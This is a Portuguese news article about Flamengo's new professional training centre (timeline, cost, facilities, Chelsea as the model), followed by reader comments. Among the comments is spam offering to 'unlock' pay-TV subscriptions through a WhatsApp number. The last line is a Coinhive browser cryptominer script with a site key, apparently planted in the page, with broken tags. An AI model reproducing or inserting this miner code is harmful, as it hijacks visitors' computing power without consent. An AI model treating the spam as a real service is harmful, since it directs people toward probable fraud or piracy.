Foto: Marcelo Baltar
O Flamengo prepara para novembro a inauguração do novo CT para o elenco profissional. As obras começaram em agosto, e a primeira etapa, com o estaqueamento do módulo, foi concluída em dezembro.
Nesta segunda-feira, o clube divulgou novas imagens do projeto do módulo, que terá o nome de Hilton Santos. O local terá uma estatua do Zico na entrada.
Como andam as obras?
As obras do novo módulo são cobertas por tapumes, mas é grande a movimentação de operários no dia a dia no Ninho do Urubu. De acordo com o vice de Patrimônio, Alexandre Wrobel, a primeira parte foi concluída em dezembro, com o estaqueamento. Os trabalhos da segunda parte do projeto já foram iniciados.
Quando será concluído?
O contrato assinado com a Lafem Engenharia prevê a conclusão das obras até dezembro deste ano. O Flamengo, no entanto, acredita que o novo CT será inaugurado em novembro. O clube conta com o espaço para a pré-temporada de 2019.
Qual é o investimento?
O novo projeto do CT está diretamente relacionado com a verba da negociação da sede do Morro da Viúva. O sinal da venda do imóvel será usado nas obras do novo CT, que custará cerca de R$ 26 milhões.
Nova estrutura
Área de 5 mil m² em dois pavimentos
42 suítes, sendo 26 individuais e seis duplas
Salas de preparação física e hidroterapia com pé direito duplo e vista para o campo
Academia de 715 m² (a atual tem 350 m²)
Parque aquático
Sala de imprensa
Espaço para patrocinadores
2 auditórios com capacidade para 50 pessoas cada
Praça de convívio para atletas e comissão técnica
Alameda de entrada com estátua do Zico
Acesso independentes para os jogadores
Acessos independentes para comissão técnica e imprensa
Inspiração no CT do Chelesa
Para o seu novo projeto, o Flamengo visitou os centros de treinamento de clubes como Chelsea, Manchester United e o da seleção inglesa (Saint George's Park), além de clubes brasileiros, como Atlético-PR e Corinthians. A principal inspiração veio do Centro de Treinamento do atual campeão inglês.
- Foi muito inspirado no CT do Chelsea – disse Alexandre Wrobel.
E a atual estrutura?
No novo CT, o elenco profissional passará a usar os campos 1, 2 e 3, hoje destinados à base. Os mais jovens, por sua vez, aproveitarão a estrutura o atual módulo, com os campos 4 e 5. Além disso, toda a estrutura atual será exclusiva das categorias de base. Alguns ajustes serão feitos. Hoje, por exemplo, os quartos são duplos, mas passarão a receber até quatro jogadores por suíte para a garotada.
Show, isso mesmo tem que pensar grande, e depois construir um estádio para 150,000 mil pessoas pois só de sócios torcedores ja temos 105,000 e os que ainda não são e deixam para comprar encima da hora. Imaginem uma final de libertadores, copa do Brasil,, sul americano ou Brasileiro.
muito bom isso !!
VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345
Erro ao postar comentário.
Código do erro: 803743
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>